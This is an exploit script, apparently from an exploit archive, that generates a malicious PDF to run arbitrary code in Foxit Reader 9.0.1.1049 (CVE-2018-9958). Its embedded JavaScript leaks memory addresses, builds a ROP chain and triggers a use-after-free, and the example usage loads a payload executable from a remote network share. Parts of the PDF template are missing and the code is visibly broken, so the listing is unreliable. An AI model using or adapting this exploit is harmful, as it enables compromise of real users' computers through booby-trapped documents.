# Exploit Title: Foxit Reader 9.0.1.1049 - Arbitrary Code Execution # Date: August 29, 2020 # Exploit Author: CrossWire # Vendor Homepage: https://www.foxitsoftware.com/ # Software Link: https://www.foxitsoftware.com/downloads/latest.php?product=Foxit-Reader&platform=Windows&version=9.0.1.1049&package_type=exe&language=English # Version: 9.0.1.1049 # Tested on: Microsoft Windows Server 2016 10.0.14393 # CVE : [2018-9958](https://nvd.nist.gov/vuln/detail/CVE-2018-9958) #!/usr/bin/python3 ''' =========================================================================== | PDF generator for Foxit Reader Remote Code Execution (CVE 2018-9958) | =========================================================================== | Written by: Kevin Dorland (CrossWire) | | Date: 08/29/2020 | | | | Exploit originally discovered by Steven Seeley (mr_me) of Source Incite | | | | References: | | https://www.exploit-db.com/exploits/44941 (Steven Seely Calc.exe PoC) | | https://www.exploit-db.com/exploits/45269 (Metasploit adaptation) | | | =========================================================================== ''' PDF_TEMPLATE = ''' %PDF 1 0 obj <> 2 0 obj < //End Path to executable rop[0x17] = 0x00000000; // adios, amigo } } function trigger_uaf(){ var that = this; var a = this.addAnnot({type:"Text", page: 0, name:"uaf"}); var arr = [1]; Object.defineProperties(arr,{ "0":{ get: function () { that.getAnnot(0, "uaf").destroy(); reclaim(); return 1; } } }); a.point = arr; } function main(){ leak_heap_chunk(); leak_vtable(); control_memory(); trigger_uaf(); } if (app.platform == "WIN"){ if (app.isFoxit == "Foxit Reader"){ if (app.appFoxitVersion == "9.0.1.1049"){ main(); } } } )>> trailer <> ''' import sys #Enforces 2 hex char byte notation. 
def format_byte(b):
    """Normalise a hex string to "0x"-prefixed form with at least two digits.

    A leading "0x" is dropped first (only when something follows it), a
    single remaining digit is left-padded with "0", and "0x" is put back on
    the front: "0" becomes "0x00" and "0xc" becomes "0x0c".  Longer inputs
    come back unchanged apart from the prefix handling.
    """
    digits = b[2:] if len(b) > 2 and b[:2] == '0x' else b
    if len(digits) == 1:
        digits = '0' + digits
    return '0x' + digits


def char2hex(c):
    """Return the code point of the single character *c* via format_byte()."""
    code_point = ord(c)
    return format_byte(hex(code_point))


def path_to_machine_code(path, little_endian=True):
    """Encode *path* as eleven 32-bit words written as "0xAABBCCDD" strings.

    The path is cut into 4-character groups and the remainder of the 44
    character budget is filled with NUL characters, so the result always
    has eleven entries.  With *little_endian* true the characters of each
    group are reversed before being written out, which puts the first
    character of the group in the low byte of the word.

    A path longer than 44 characters prints an error and ends the process
    through exit(-1).  The limit is checked in characters, not encoded
    bytes; a character above U+00FF yields more than two hex digits and
    therefore a word longer than eight digits.
    """
    print("[+] Encoding Path:", path)

    if len(path) > 44:
        print("[CRITICAL] Path length greater than 44 characters (bytes). Aborting!")
        exit(-1)

    # Eleven fixed slots: slices past the end of the path are empty and end
    # up consisting of NULs only.
    nul = chr(0)
    groups = [path[offset:offset + 4].ljust(4, nul) for offset in range(0, 44, 4)]

    encoded = []
    for group in groups:
        ordered = group[::-1] if little_endian else group
        # char2hex() returns "0xNN"; only the digits after the prefix are kept.
        encoded.append('0x' + ''.join(char2hex(ch)[2:] for ch in ordered))
    return encoded


def create_rop(hex_arr, start_index='0c'):
    """Render *hex_arr* as tab-indented ``rop[0xNN] = WORD;`` lines.

    *start_index* is parsed as a hexadecimal string and gives the array
    index of the first word; each following word takes the next index.
    The lines are joined with newlines, without a trailing newline.
    """
    first_slot = int(start_index, 16)
    lines = [
        f"\trop[{format_byte(hex(slot))}] = {word};"
        for slot, word in enumerate(hex_arr, start=first_slot)
    ]
    return '\n'.join(lines)


if __name__ == '__main__':
    # Expects exactly two arguments: the executable path to encode and the
    # name of the PDF file to write.
    if len(sys.argv) != 3:
        # NOTE(review): nothing follows the program name in the usage line as
        # extracted; the argument placeholders were presumably lost - confirm
        # against the original listing.
        print(f"USAGE: {sys.argv[0]} ")
        print("-- EXAMPLES --")
        print(f"{sys.argv[0]} \\\\192.168.0.1\\exploits\\bad.exe evil.pdf")
        exit(-1)

    EXE_PATH, PDF_PATH = sys.argv[1], sys.argv[2]

    # Encode the path and show the resulting words.
    raw_hex = path_to_machine_code(EXE_PATH)
    print("[+] Machine Code:")
    for hex_word in raw_hex:
        print(hex_word)

    ord_string = create_rop(raw_hex)
    print("[+] Instructions to add:")
    print(ord_string)

    print("[+] Generating pdf...")
    print("\t- Filling template...")
    # NOTE(review): the search string is empty as extracted, so str.replace
    # would insert ord_string between every character of PDF_TEMPLATE. The
    # placeholder token was presumably lost together with the rest of the
    # angle-bracketed template content - confirm against the original listing.
    evil_pdf = PDF_TEMPLATE.replace('', ord_string)

    print("\t- Writing file...")
    with open(PDF_PATH, 'w') as out_file:
        out_file.write(evil_pdf)
    print("[+] Generated pdf:", PDF_PATH)